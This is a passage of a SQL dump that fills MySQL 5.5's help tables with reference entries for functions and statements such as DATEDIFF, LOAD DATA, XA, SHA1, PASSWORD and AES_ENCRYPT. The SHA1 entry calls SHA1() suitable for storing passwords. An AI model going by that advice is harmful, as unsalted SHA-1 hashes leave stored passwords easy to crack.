http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(415,'DATEDIFF',32,'Syntax:\nDATEDIFF(expr1,expr2)\n\nDATEDIFF() returns expr1 − expr2 expressed as a value in days from\none date to the other. expr1 and expr2 are date or date-and-time\nexpressions. Only the date parts of the values are used in the\ncalculation.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DATEDIFF(\'2007-12-31 23:59:59\',\'2007-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'2010-11-30 23:59:59\',\'2010-12-31\');\n -> -31\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(416,'DROP TABLESPACE',40,'Syntax:\nDROP TABLESPACE tablespace_name\n ENGINE [=] engine_name\n\nThis statement drops a tablespace that was previously created using\nCREATE TABLESPACE (see [HELP CREATE TABLESPACE]).\n\n*Important*: The tablespace to be dropped must not contain any data\nfiles; in other words, before you can drop a tablespace, you must first\ndrop each of its data files using ALTER TABLESPACE ... DROP DATAFILE\n(see [HELP ALTER TABLESPACE]).\n\nThe ENGINE clause (required) specifies the storage engine used by the\ntablespace. Currently, the only accepted values for engine_name are NDB\nand NDBCLUSTER.\n\nDROP TABLESPACE is useful only with Disk Data storage for MySQL\nCluster. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-tablespace.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-tablespace.html'),(417,'DROP PROCEDURE',40,'Syntax:\nDROP {PROCEDURE | FUNCTION} [IF EXISTS] sp_name\n\nThis statement is used to drop a stored procedure or function. That is,\nthe specified routine is removed from the server. You must have the\nALTER ROUTINE privilege for the routine. (If the\nautomatic_sp_privileges system variable is enabled, that privilege and\nEXECUTE are granted automatically to the routine creator when the\nroutine is created and dropped from the creator when the routine is\ndropped. See\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-routines-privileges.html.\n)\n\nThe IF EXISTS clause is a MySQL extension. It prevents an error from\noccurring if the procedure or function does not exist. A warning is\nproduced that can be viewed with SHOW WARNINGS.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-procedure.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-procedure.html'),(418,'CHECK TABLE',21,'Syntax:\nCHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {\n FOR UPGRADE\n | QUICK\n | FAST\n | MEDIUM\n | EXTENDED\n | CHANGED\n}\n\nCHECK TABLE checks a table or tables for errors. CHECK TABLE works for\nInnoDB, MyISAM, ARCHIVE, and CSV tables. For MyISAM tables, the key\nstatistics are updated as well.\n\nTo check a table, you must have some privilege for it.\n\nCHECK TABLE can also check views for problems, such as tables that are\nreferenced in the view definition that no longer exist.\n\nCHECK TABLE is supported for partitioned tables, and you can use ALTER\nTABLE ... CHECK PARTITION to check one or more partitions; for more\ninformation, see [HELP ALTER TABLE], and\nhttp://dev.mysql.com/doc/refman/5.5/en/partitioning-maintenance.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/check-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/check-table.html'),(419,'BIN',38,'Syntax:\nBIN(N)\n\nReturns a string representation of the binary value of N, where N is a\nlonglong (BIGINT) number. This is equivalent to CONV(N,10,2). Returns\nNULL if N is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT BIN(12);\n -> \'1100\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(420,'INSTALL PLUGIN',5,'Syntax:\nINSTALL PLUGIN plugin_name SONAME \'shared_library_name\'\n\nThis statement installs a server plugin. It requires the INSERT\nprivilege for the mysql.plugin table.\n\nplugin_name is the name of the plugin as defined in the plugin\ndescriptor structure contained in the library file (see\nhttp://dev.mysql.com/doc/refman/5.5/en/plugin-data-structures.html).\nPlugin names are not case sensitive. For maximal compatibility, plugin\nnames should be limited to ASCII letters, digits, and underscore\nbecause they are used in C source files, shell command lines, M4 and\nBourne shell scripts, and SQL environments.\n\nshared_library_name is the name of the shared library that contains the\nplugin code. The name includes the file name extension (for example,\nlibmyplugin.so, libmyplugin.dll, or libmyplugin.dylib).\n\nThe shared library must be located in the plugin directory (the\ndirectory named by the plugin_dir system variable). The library must be\nin the plugin directory itself, not in a subdirectory. By default,\nplugin_dir is the plugin directory under the directory named by the\npkglibdir configuration variable, but it can be changed by setting the\nvalue of plugin_dir at server startup. For example, set its value in a\nmy.cnf file:\n\n[mysqld]\nplugin_dir=/path/to/plugin/directory\n\nIf the value of plugin_dir is a relative path name, it is taken to be\nrelative to the MySQL base directory (the value of the basedir system\nvariable).\n\nINSTALL PLUGIN loads and initializes the plugin code to make the plugin\navailable for use. A plugin is initialized by executing its\ninitialization function, which handles any setup that the plugin must\nperform before it can be used. When the server shuts down, it executes\nthe deinitialization function for each plugin that is loaded so that\nthe plugin has a chance to perform any final cleanup.\n\nINSTALL PLUGIN also registers the plugin by adding a line that\nindicates the plugin name and library file name to the mysql.plugin\ntable. At server startup, the server loads and initializes any plugin\nthat is listed in the mysql.plugin table. This means that a plugin is\ninstalled with INSTALL PLUGIN only once, not every time the server\nstarts. Plugin loading at startup does not occur if the server is\nstarted with the --skip-grant-tables option.\n\nA plugin library can contain multiple plugins. For each of them to be\ninstalled, use a separate INSTALL PLUGIN statement. Each statement\nnames a different plugin, but all of them specify the same library\nname.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/install-plugin.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/install-plugin.html'),(421,'DECLARE CURSOR',24,'Syntax:\nDECLARE cursor_name CURSOR FOR select_statement\n\nThis statement declares a cursor and associates it with a SELECT\nstatement that retrieves the rows to be traversed by the cursor. To\nfetch the rows later, use a FETCH statement. The number of columns\nretrieved by the SELECT statement must match the number of output\nvariables specified in the FETCH statement.\n\nThe SELECT statement cannot have an INTO clause.\n\nCursor declarations must appear before handler declarations and after\nvariable and condition declarations.\n\nA stored program may contain multiple cursor declarations, but each\ncursor declared in a given block must have a unique name. For an\nexample, see http://dev.mysql.com/doc/refman/5.5/en/cursors.html.\n\nFor information available through SHOW statements, it is possible in\nmany cases to obtain equivalent information by using a cursor with an\nINFORMATION_SCHEMA table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/declare-cursor.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/declare-cursor.html'),(422,'LOAD DATA',28,'Syntax:\nLOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [CHARACTER SET charset_name]\n [{FIELDS | COLUMNS}\n [TERMINATED BY \'string\']\n [[OPTIONALLY] ENCLOSED BY \'char\']\n [ESCAPED BY \'char\']\n ]\n [LINES\n [STARTING BY \'string\']\n [TERMINATED BY \'string\']\n ]\n [IGNORE number {LINES | ROWS}]\n [(col_name_or_user_var,...)]\n [SET col_name = expr,...]\n\nThe LOAD DATA INFILE statement reads rows from a text file into a table\nat a very high speed. LOAD DATA INFILE is the complement of SELECT ...\nINTO OUTFILE. (See\nhttp://dev.mysql.com/doc/refman/5.5/en/select-into.html.) To write data\nfrom a table to a file, use SELECT ... INTO OUTFILE. To read the file\nback into a table, use LOAD DATA INFILE. The syntax of the FIELDS and\nLINES clauses is the same for both statements. Both clauses are\noptional, but FIELDS must precede LINES if both are specified.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the client\nhost. You can specify the --compress option to get better performance\nover slow networks if the client and server support the compressed\nprotocol. See http://dev.mysql.com/doc/refman/5.5/en/mysqlimport.html.\n\nFor more information about the efficiency of INSERT versus LOAD DATA\nINFILE and speeding up LOAD DATA INFILE, see\nhttp://dev.mysql.com/doc/refman/5.5/en/insert-speed.html.\n\nThe file name must be given as a literal string. On Windows, specify\nbackslashes in path names as forward slashes or doubled backslashes.\nThe character_set_filesystem system variable controls the\ninterpretation of the file name.\n\nThe server uses the character set indicated by the\ncharacter_set_database system variable to interpret the information in\nthe file. SET NAMES and the setting of character_set_client do not\naffect interpretation of input. If the contents of the input file use a\ncharacter set that differs from the default, it is usually preferable\nto specify the character set of the file by using the CHARACTER SET\nclause. A character set of binary specifies \"no conversion.\"\n\nLOAD DATA INFILE interprets all fields in the file as having the same\ncharacter set, regardless of the data types of the columns into which\nfield values are loaded. For proper interpretation of file contents,\nyou must ensure that it was written with the correct character set. For\nexample, if you write a data file with mysqldump -T or by issuing a\nSELECT ... INTO OUTFILE statement in mysql, be sure to use a\n--default-character-set option so that output is written in the\ncharacter set to be used when the file is loaded with LOAD DATA INFILE.\n\n*Note*: It is not possible to load data files that use the ucs2, utf16,\nor utf32 character set.\n\nIf you use LOW_PRIORITY, execution of the LOAD DATA statement is\ndelayed until no other clients are reading from the table. This affects\nonly storage engines that use only table-level locking (such as MyISAM,\nMEMORY, and MERGE).\n\nIf you specify CONCURRENT with a MyISAM table that satisfies the\ncondition for concurrent inserts (that is, it contains no free blocks\nin the middle), other threads can retrieve data from the table while\nLOAD DATA is executing. This option affects the performance of LOAD\nDATA a bit, even if no other thread is using the table at the same\ntime.\n\nWith row-based replication, CONCURRENT is replicated regardless of\nMySQL version. With statement-based replication CONCURRENT is not\nreplicated prior to MySQL 5.5.1 (see Bug #34628). For more information,\nsee\nhttp://dev.mysql.com/doc/refman/5.5/en/replication-features-load-data.h\ntml.\n\nThe LOCAL keyword affects expected location of the file and error\nhandling, as described later. LOCAL works only if your server and your\nclient both have been configured to permit it. For example, if mysqld\nwas started with --local-infile=0, LOCAL does not work. See\nhttp://dev.mysql.com/doc/refman/5.5/en/load-data-local.html.\n\nThe LOCAL keyword affects where the file is expected to be found:\n\no If LOCAL is specified, the file is read by the client program on the\n client host and sent to the server. The file can be given as a full\n path name to specify its exact location. If given as a relative path\n name, the name is interpreted relative to the directory in which the\n client program was started.\n\n When using LOCAL with LOAD DATA, a copy of the file is created in the\n server\'s temporary directory. This is not the directory determined by\n the value of tmpdir or slave_load_tmpdir, but rather the operating\n system\'s temporary directory, and is not configurable in the MySQL\n Server. (Typically the system temporary directory is /tmp on Linux\n systems and C:\\WINDOWS\\TEMP on Windows.) Lack of sufficient space for\n the copy in this directory can cause the LOAD DATA LOCAL statement to\n fail.\n\no If LOCAL is not specified, the file must be located on the server\n host and is read directly by the server. The server uses the\n following rules to locate the file:\n\n o If the file name is an absolute path name, the server uses it as\n given.\n\n o If the file name is a relative path name with one or more leading\n components, the server searches for the file relative to the\n server\'s data directory.\n\n o If a file name with no leading components is given, the server\n looks for the file in the database directory of the default\n database.\n\nIn the non-LOCAL case, these rules mean that a file named as\n./myfile.txt is read from the server\'s data directory, whereas the file\nnamed as myfile.txt is read from the database directory of the default\ndatabase. For example, if db1 is the default database, the following\nLOAD DATA statement reads the file data.txt from the database directory\nfor db1, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nLOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nFor security reasons, when reading text files located on the server,\nthe files must either reside in the database directory or be readable\nby the user account used to run the server. Also, to use LOAD DATA\nINFILE on server files, you must have the FILE privilege. See\nhttp://dev.mysql.com/doc/refman/5.5/en/privileges-provided.html. For\nnon-LOCAL load operations, if the secure_file_priv system variable is\nset to a nonempty directory name, the file to be loaded must be located\nin that directory.\n\nUsing LOCAL is a bit slower than letting the server access the files\ndirectly, because the contents of the file must be sent over the\nconnection by the client to the server. On the other hand, you do not\nneed the FILE privilege to load local files.\n\nLOCAL also affects error handling:\n\no With LOAD DATA INFILE, data-interpretation and duplicate-key errors\n terminate the operation.\n\no With LOAD DATA LOCAL INFILE, data-interpretation and duplicate-key\n errors become warnings and the operation continues because the server\n has no way to stop transmission of the file in the middle of the\n operation. For duplicate-key errors, this is the same as if IGNORE is\n specified. IGNORE is explained further later in this section.\n\nThe REPLACE and IGNORE keywords control handling of input rows that\nduplicate existing rows on unique key values:\n\no If you specify REPLACE, input rows replace existing rows. In other\n words, rows that have the same value for a primary key or unique\n index as an existing row. See [HELP REPLACE].\n\no If you specify IGNORE, rows that duplicate an existing row on a\n unique key value are discarded.\n\no If you do not specify either option, the behavior depends on whether\n the LOCAL keyword is specified. Without LOCAL, an error occurs when a\n duplicate key value is found, and the rest of the text file is\n ignored. With LOCAL, the default behavior is the same as if IGNORE is\n specified; this is because the server has no way to stop transmission\n of the file in the middle of the operation.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/load-data.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/load-data.html'),(423,'MULTILINESTRING',25,'MultiLineString(ls1,ls2,...)\n\nConstructs a MultiLineString value using LineString or WKB LineString\narguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(424,'LOCALTIME',32,'Syntax:\nLOCALTIME, LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for NOW().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(425,'SHOW RELAYLOG EVENTS',27,'Syntax:\nSHOW RELAYLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the relay log of a replication slave. If you do not\nspecify \'log_name\', the first relay log is displayed. This statement\nhas no effect on the master.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-relaylog-events.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-relaylog-events.html'),(426,'MPOINTFROMTEXT',4,'MPointFromText(wkt[,srid]), MultiPointFromText(wkt[,srid])\n\nConstructs a MultiPoint value using its WKT representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(427,'BLOB',23,'BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535 (216 − 1) bytes. Each\nBLOB value is stored using a 2-byte length prefix that indicates the\nnumber of bytes in the value.\n\nAn optional length M can be given for this type. If this is done, MySQL\ncreates the column as the smallest BLOB type large enough to hold\nvalues M bytes long.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(428,'SHA1',12,'Syntax:\nSHA1(str), SHA(str)\n\nCalculates an SHA-1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of\n40 hex digits, or NULL if the argument was NULL. One of the possible\nuses for this function is as a hash key. See the notes at the beginning\nof this section about storing hash values efficiently. You can also use\nSHA1() as a cryptographic function for storing passwords. SHA() is\nsynonymous with SHA1().\n\nAs of MySQL 5.5.3, the return value is a nonbinary string in the\nconnection character set. Before 5.5.3, the return value is a binary\nstring; see the notes at the beginning of this section about using the\nvalue as a nonbinary string.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(429,'SUBSTR',38,'Syntax:\nSUBSTR(str,pos), SUBSTR(str FROM pos), SUBSTR(str,pos,len), SUBSTR(str\nFROM pos FOR len)\n\nSUBSTR() is a synonym for SUBSTRING().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(430,'PASSWORD',12,'Syntax:\nPASSWORD(str)\n\nReturns a hashed password string calculated from the cleartext password\nstr. The return value is a nonbinary string in the connection character\nset (a binary string before MySQL 5.5.3), or NULL if the argument is\nNULL. This function is the SQL interface to the algorithm used by the\nserver to encrypt MySQL passwords for storage in the mysql.user grant\ntable.\n\nThe old_passwords system variable controls the password hashing method\nused by the PASSWORD() function. It also influences password hashing\nperformed by CREATE USER and GRANT statements that specify a password\nusing an IDENTIFIED BY clause.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SET old_passwords = 0;\nmysql> SELECT PASSWORD(\'mypass\'), OLD_PASSWORD(\'mypass\');\n+-------------------------------------------+------------------------+\n| PASSWORD(\'mypass\') | OLD_PASSWORD(\'mypass\') |\n+-------------------------------------------+------------------------+\n| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | 6f8c114b58f2ce9e |\n+-------------------------------------------+------------------------+\n\nmysql> SET old_passwords = 1;\nmysql> SELECT PASSWORD(\'mypass\'), OLD_PASSWORD(\'mypass\');\n+--------------------+------------------------+\n| PASSWORD(\'mypass\') | OLD_PASSWORD(\'mypass\') |\n+--------------------+------------------------+\n| 6f8c114b58f2ce9e | 6f8c114b58f2ce9e |\n+--------------------+------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(431,'CHAR',23,'[NATIONAL] CHAR[(M)] [CHARACTER SET charset_name] [COLLATE\ncollation_name]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length in\ncharacters. The range of M is 0 to 255. If M is omitted, the length is\n1.\n\n*Note*: Trailing spaces are removed when CHAR values are retrieved\nunless the PAD_CHAR_TO_FULL_LENGTH SQL mode is enabled.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(432,'UTC_DATE',32,'Syntax:\nUTC_DATE, UTC_DATE()\n\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or YYYYMMDD\nformat, depending on whether the function is used in a string or\nnumeric context.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(433,'DIMENSION',37,'Dimension(g)\n\nReturns the inherent dimension of the geometry value g. The result can\nbe −1, 0, 1, or 2. The meaning of these values is given in\nhttp://dev.mysql.com/doc/refman/5.5/en/gis-class-geometry.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(434,'COUNT DISTINCT',16,'Syntax:\nCOUNT(DISTINCT expr,[expr...])\n\nReturns a count of the number of rows with different non-NULL expr\nvalues.\n\nCOUNT(DISTINCT) returns 0 if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT COUNT(DISTINCT results) FROM student;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(435,'BIT',23,'BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(436,'XA',8,'Syntax:\nXA {START|BEGIN} xid [JOIN|RESUME]\n\nXA END xid [SUSPEND [FOR MIGRATE]]\n\nXA PREPARE xid\n\nXA COMMIT xid [ONE PHASE]\n\nXA ROLLBACK xid\n\nXA RECOVER\n\nFor XA START, the JOIN and RESUME clauses are not supported.\n\nFor XA END the SUSPEND [FOR MIGRATE] clause is not supported.\n\nEach XA statement begins with the XA keyword, and most of them require\nan xid value. An xid is an XA transaction identifier. It indicates\nwhich transaction the statement applies to. xid values are supplied by\nthe client, or generated by the MySQL server. An xid value has from one\nto three parts:\n\nxid: gtrid [, bqual [, formatID ]]\n\ngtrid is a global transaction identifier, bqual is a branch qualifier,\nand formatID is a number that identifies the format used by the gtrid\nand bqual values. As indicated by the syntax, bqual and formatID are\noptional. The default bqual value is \'\' if not given. The default\nformatID value is 1 if not given.\n\ngtrid and bqual must be string literals, each up to 64 bytes (not\ncharacters) long. gtrid and bqual can be specified in several ways. You\ncan use a quoted string (\'ab\'), hex string (0x6162, X\'ab\'), or bit\nvalue (b\'nnnn\').\n\nformatID is an unsigned integer.\n\nThe gtrid and bqual values are interpreted in bytes by the MySQL\nserver\'s underlying XA support routines. However, while an SQL\nstatement containing an XA statement is being parsed, the server works\nwith some specific character set. To be safe, write gtrid and bqual as\nhex strings.\n\nxid values typically are generated by the Transaction Manager. Values\ngenerated by one TM must be different from values generated by other\nTMs. A given TM must be able to recognize its own xid values in a list\nof values returned by the XA RECOVER statement.\n\nFor XA START xid starts an XA transaction with the given xid value.\nEach XA transaction must have a unique xid value, so the value must not\ncurrently be used by another XA transaction. Uniqueness is assessed\nusing the gtrid and bqual values. All following XA statements for the\nXA transaction must be specified using the same xid value as that given\nin the XA START statement. If you use any of those statements but\nspecify an xid value that does not correspond to some existing XA\ntransaction, an error occurs.\n\nOne or more XA transactions can be part of the same global transaction.\nAll XA transactions within a given global transaction must use the same\ngtrid value in the xid value. For this reason, gtrid values must be\nglobally unique so that there is no ambiguity about which global\ntransaction a given XA transaction is part of. The bqual part of the\nxid value must be different for each XA transaction within a global\ntransaction. (The requirement that bqual values be different is a\nlimitation of the current MySQL XA implementation. It is not part of\nthe XA specification.)\n\nThe XA RECOVER statement returns information for those XA transactions\non the MySQL server that are in the PREPARED state. (See\nhttp://dev.mysql.com/doc/refman/5.5/en/xa-states.html.) The output\nincludes a row for each such XA transaction on the server, regardless\nof which client started it.\n\nXA RECOVER output rows look like this (for an example xid value\nconsisting of the parts \'abc\', \'def\', and 7):\n\nmysql> XA RECOVER;\n+----------+--------------+--------------+--------+\n| formatID | gtrid_length | bqual_length | data |\n+----------+--------------+--------------+--------+\n| 7 | 3 | 3 | abcdef |\n+----------+--------------+--------------+--------+\n\nThe output columns have the following meanings:\n\no formatID is the formatID part of the transaction xid\n\no gtrid_length is the length in bytes of the gtrid part of the xid\n\no bqual_length is the length in bytes of the bqual part of the xid\n\no data is the concatenation of the gtrid and bqual parts of the xid\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/xa-statements.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/xa-statements.html'),(437,'EQUALS',31,'Equals(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 is spatially equal to g2.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(438,'SHOW CREATE VIEW',27,'Syntax:\nSHOW CREATE VIEW view_name\n\nThis statement shows the CREATE VIEW statement that creates the named\nview.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-view.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-create-view.html'),(439,'CENTROID',2,'Centroid(mpoly)\n\nReturns the mathematical centroid for the MultiPolygon value mpoly as a\nPoint. The result is not guaranteed to be on the MultiPolygon.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html\n\n','mysql> SET @poly =\n -> GeomFromText(\'POLYGON((0 0,10 0,10 10,0 10,0 0),(5 5,7 5,7 7,5 7,5 5))\');\nmysql> SELECT GeometryType(@poly),AsText(Centroid(@poly));\n+---------------------+--------------------------------------------+\n| GeometryType(@poly) | AsText(Centroid(@poly)) |\n+---------------------+--------------------------------------------+\n| POLYGON | POINT(4.958333333333333 4.958333333333333) |\n+---------------------+--------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html'),(440,'INTERVAL',20,'Syntax:\nINTERVAL(N,N1,N2,N3,...)\n\nReturns 0 if N < N1, 1 if N < N2 and so on or -1 if N is NULL. All\narguments are treated as integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because a binary\nsearch is used (very fast).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(441,'FROM_DAYS',32,'Syntax:\nFROM_DAYS(N)\n\nGiven a day number N, returns a DATE value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT FROM_DAYS(730669);\n -> \'2007-07-03\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(442,'ALTER PROCEDURE',40,'Syntax:\nALTER PROCEDURE proc_name [characteristic ...]\n\ncharacteristic:\n COMMENT \'string\'\n | LANGUAGE SQL\n | { CONTAINS SQL | NO SQL | READS SQL DATA | MODIFIES SQL DATA }\n | SQL SECURITY { DEFINER | INVOKER }\n\nThis statement can be used to change the characteristics of a stored\nprocedure. More than one change may be specified in an ALTER PROCEDURE\nstatement. However, you cannot change the parameters or body of a\nstored procedure using this statement; to make such changes, you must\ndrop and re-create the procedure using DROP PROCEDURE and CREATE\nPROCEDURE.\n\nYou must have the ALTER ROUTINE privilege for the procedure. By\ndefault, that privilege is granted automatically to the procedure\ncreator. This behavior can be changed by disabling the\nautomatic_sp_privileges system variable. See\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-routines-privileges.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-procedure.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-procedure.html'),(443,'BIT_COUNT',19,'Syntax:\nBIT_COUNT(N)\n\nReturns the number of bits that are set in the argument N.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT BIT_COUNT(29), BIT_COUNT(b\'101010\');\n -> 4, 3\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(444,'OCTET_LENGTH',38,'Syntax:\nOCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(445,'UTC_TIMESTAMP',32,'Syntax:\nUTC_TIMESTAMP, UTC_TIMESTAMP()\n\nReturns the current UTC date and time as a value in \'YYYY-MM-DD\nHH:MM:SS\' or YYYYMMDDHHMMSS.uuuuuu format, depending on whether the\nfunction is used in a string or numeric context.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804.000000\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(446,'AES_ENCRYPT',12,'Syntax:\nAES_ENCRYPT(str,key_str)\n\nAES_ENCRYPT() and AES_DECRYPT() implement encryption and decryption of\ndata using the official AES (Advanced Encryption Standard) algorithm,\npreviously known as \"Rijndael.\" The AES standard permits various key\nlengths. These functions implement AES with a 128-bit key length, but\nyou can extend them to 256 bits by modifying the source. The key length\nis a trade off between performance and security.\n\nAES_ENCRYPT() encrypts the string str using the key string key_str and\nreturns a binary string containing the encrypted output. AES_DECRYPT()\ndecrypts the encrypted string crypt_str using the key string key_str\nand returns the original cleartext string. If either function argument\nis NULL, the function returns NULL.\n\nThe str and crypt_str arguments can be any length, and padding is\nautomatically added to str so it is a multiple of a block as required\nby block-based algorithms such as AES. This padding is automatically\nremoved by the AES_DECRYPT() function. The length of crypt_str can be\ncalculated using this formula:\n\n16 * (trunc(string_length / 16) + 1)\n\nFor a key length of 128 bits, the most secure way to pass a key to the\nkey_str argument is to create a truly random 128-bit value and pass it\nas a binary value. For example:\n\nINSERT INTO t\nVALUES (1,AES_ENCRYPT(\'text\',UNHEX(\'F3229A0B371ED2D9441B830D21A390C3\')));\n\nA passphrase can be used to generate an AES key by hashing the\npassphrase. For example:\n\nINSERT INTO t VALUES (1,AES_ENCRYPT(\'text\', SHA2(\'My secret passphrase\',512)));\n\nDo not pass a password or passphrase directly to crypt_str, hash it\nfirst. Previous versions of this documentation suggested the former\napproach, but it is no longer recommended as the examples shown here\nare more secure.\n\nIf AES_DECRYPT() detects invalid data or incorrect padding, it returns\nNULL. However, it is possible for AES_DECRYPT() to return a non-NULL\nvalue (possibly garbage) if the input data or the key is invalid.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(447,'+',3,'Syntax:\n+\n\nAddition:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT 3+5;\n -> 8\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(448,'INET_NTOA',14,'Syntax:\nINET_NTOA(expr)\n\nGiven a numeric IPv4 network address in network byte order, returns the\ndotted-quad representation of the address as a string. INET_NTOA()\nreturns NULL if it does not understand its argument.\n\nAs of MySQL 5.5.3, the return value is a nonbinary string in the\nconnection character set. Before 5.5.3, the return value is a binary\nstring.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> SELECT INET_NTOA(167773449);\n -> 